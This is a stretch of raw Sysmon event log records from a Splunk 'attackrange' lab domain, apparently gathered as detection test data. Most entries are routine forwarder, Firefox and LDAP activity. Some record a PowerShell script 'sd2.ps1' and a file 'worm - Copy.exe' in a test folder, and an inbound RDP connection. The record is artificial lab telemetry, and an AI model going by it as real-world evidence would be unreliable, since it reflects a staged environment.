23542300x80000000000000001055483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:06.791{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63FD76258C4DCC351416930AF3C5234A,SHA256=23E8EE875836FD4ED3F4428E22C51AC3C91544C647F218D74F0136D413508A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:06.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F58AC71B106E6F48B3E57BD0C73707,SHA256=AC27A473B291017D6766613576480DDA8328DBF979CB8D62EDBC1E8B7585DCD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:06.592{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:06.507{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001055480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:06.507{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001055479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:10:06.507{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1219.42868743C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001055478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:10:06.507{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1219.42868743C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001055484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:07.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C8213E11CE548C1805AFEC147778F47,SHA256=57C34F7544B38BBD0B16873A418398D064A475D9D26FC2C1B49A6C448D01378B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:06.322{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57493-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:07.189{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE695FC926BB13ED51CB6E9657C4DDEB,SHA256=B39948C573AF4E9BB0526E2BC41943F374C427D1B4360ACAA4CA85A15505B91A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8E60678E647D0DA32C6BC88DFFE509,SHA256=32D1A02402A5071F07DEB155D0896C3FFF2E886DB96309DBD60FC47F4CD44B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:08.189{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC1A4DB4B462F0D6F1C1409E57DE4D8,SHA256=CCE813743E4E1B67041CE7AD03F69E74A9CAABB956A6463AF60C236097601AAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.290{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=066580A32C31085B505DA4304D18E6AD,SHA256=8C6E4DECF2968E2642CE7CA0EB0F52F73D29EA6FFAABC5A52C13780469B932A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:09.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B446BE4283E65BECFEA297785043789D,SHA256=F3B18154A174BB2AF498BB0D2E7EEB9DE21B52FC4B4F06D0082C6C6EA2946550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:09.924{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60C5A0FFBFF92773D834F057F489C6B6,SHA256=A51BC88222893DEA9619082FCCB6F6600560F3C3DF5AD978A4522F44E8EF05E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:09.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A42971812D0A6C4AF7119193623BAD0,SHA256=E9834BA35F697020ABA7B7C54D1E316408B8C80818C743172773FB704A56D491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:09.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E70944BC56B7A562109EA0AD755ECD8,SHA256=DF23AB37626A32FC04F8A2C106F9971F09B9B9C81BB64728C57E587FA316D9E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:01.528{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-63687-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:10.873{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04E35C911FC8BCA38D8ECCA0494E2434,SHA256=F57892238EBCAB7A4E1D85619F4F01517A2E4C3470E7D2CB5CA6ADC34015A98C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:10.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA92EE4FD925F751133C0B673DF6389E,SHA256=82BBAAFE559D11491DAB8C58A3AE9AF0A71390EE7E098D8F4320B31CCCF3CCB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:02.646{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62005-false10.0.1.12-8000- 23542300x80000000000000001055493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:11.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=830D3B21C83F8F33F683F13D5CDBB482,SHA256=CE12DFFC367FC2EC18FC30FBD7962311E099F92B01938C687BD66B5BFF3118B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:11.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28465A0D6EC52C9A3B28AC45A73AC40,SHA256=82F444FF36181DFA894AC8D3E7F0B19B15441C2703CE06BA8B0C34B3CCBBB9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:12.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB8979FE76094DC2B5CBE0BBFC8E58E,SHA256=0817F14B4303977FA26584185BA10400DD292D256C9194B11AF446ABCBED83E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:12.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7629DBD5AA6CFD0271776239E0CDC6CB,SHA256=8141E0E3E23F8F30664471CE764695ADB6BC08C913DF1DB69568A1F604060D52,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:12.442{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001055494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:12.442{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=1B5BABF70F1434DFBB9E2810AEF1CB90,SHA256=AF5915D73F1B4569F4D4F99977614ADBCDD080627FAA3351187E44B18A34BA01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.923{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28BFD7D1277ED09519099DF642E66F50,SHA256=0A59192FEDFEA9CD14DE96C7B7733FA5880DE981CDFB93F2B1A89F9ED13912F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:13.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A5ACA77D9FFA3C0BD51E1FC0A8F4CF3,SHA256=A04197AB6A89B73DD6FDD06C3AD090A6C910660B23248F37D09998CC5A842A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.341{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\sd2.ps1@2021-07-12_081008MD5=825635D781CDB283AA60604F0A86A18E,SHA256=06D071FD5C75DFDA52208A962D2D1256A20C48431C9F4BFC0EA2E971C61BA10C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.341{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 23542300x80000000000000001055497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.341{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps1MD5=62B41225D59C431B6C7299EDBAE98630,SHA256=5E62CDC587612962F3176F64AD3700B0C6E083386C2E0968FCE255907E042A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:14.941{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCD76A38FF056796169E49472EACC54,SHA256=CD230D39BFFA49C1F4E504B83B992DD5FFA87437A0492A1B6028C56A13877409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:14.267{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E41425B6CE3280FC906F9FED56014F,SHA256=7E39B1A2B11D71B4B46BFBBFD1E14A86909FFB214194328C9ADFFEF4625199F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:12.291{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57494-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:15.956{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F246C3A57D2CDD2CCDCB808002697F48,SHA256=95AC4784CC94B79BA3E67C5BA5147DC0D46CCAB24D6744040A3EB99B523E1F10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:15.295{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37FA3A9AABEF4CDF621551464A22B5C6,SHA256=6A2BFA9E62FB25C6F562B0941BB5B40F0B10A38E3FCB1486F0C8141678190D8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:15.641{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8A00A1462AA97FEA08A3EB09B7EC85C,SHA256=B261C5564D011786C0CFAA16353FC501C32C087218DD0C1380B3E957328F7612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:15.641{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B446BE4283E65BECFEA297785043789D,SHA256=F3B18154A174BB2AF498BB0D2E7EEB9DE21B52FC4B4F06D0082C6C6EA2946550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:16.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BDBFC50DA00508FD2F9D72BD78E11CC,SHA256=97C24E4C2D7DB2CEFE83B01A62F74E06FDBBC35FD1975B6E943EAF64759CD93D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:16.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84B5440FECD002C7E2126CE6307B82C3,SHA256=5BAAF0E58B887C5932CC69749A83044BC85A05B077FAB01CFEC5AF98E2C5C88A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.144{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62007-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:08.144{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62007-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:07.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62006-false10.0.1.12-8000- 23542300x80000000000000001055510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:17.987{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9892E234B65E11518EB9902D1C9C2343,SHA256=24E888C0D46E7E1E2767A12777F4EC154F38435194FD5AC53BE5F7AC7D9904D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:17.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F14A585AD58C78FCF97513578DD26E,SHA256=32C1E55871103A315DB624FF881B76227827220F4A64A6A4581D127E6D3A569F,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 08:10:17.971{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\worm - Copy.exe2021-07-12 08:10:17.971 23542300x8000000000000000810791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:18.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF00AAEA702FDE8FF7D335D2017B1C6B,SHA256=57DCE7402D136A8458128871E2AE30D754D2CA070037AB96D6607D70BC0D2B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:18.620{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:19.342{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF5E9D979791249330D90EDE7B2F6137,SHA256=F7454EA1FD4BD1EE2097A87088407CD2E190C418CE55B02F9213F75982B68F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:19.003{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E40CBA4D9F23B817BAD08908B4D3A99,SHA256=D2A5B706FD0F2CB91A18DA9E6F8F4960BF6FE17B2C7015448E043C59831B25B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:20.920{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 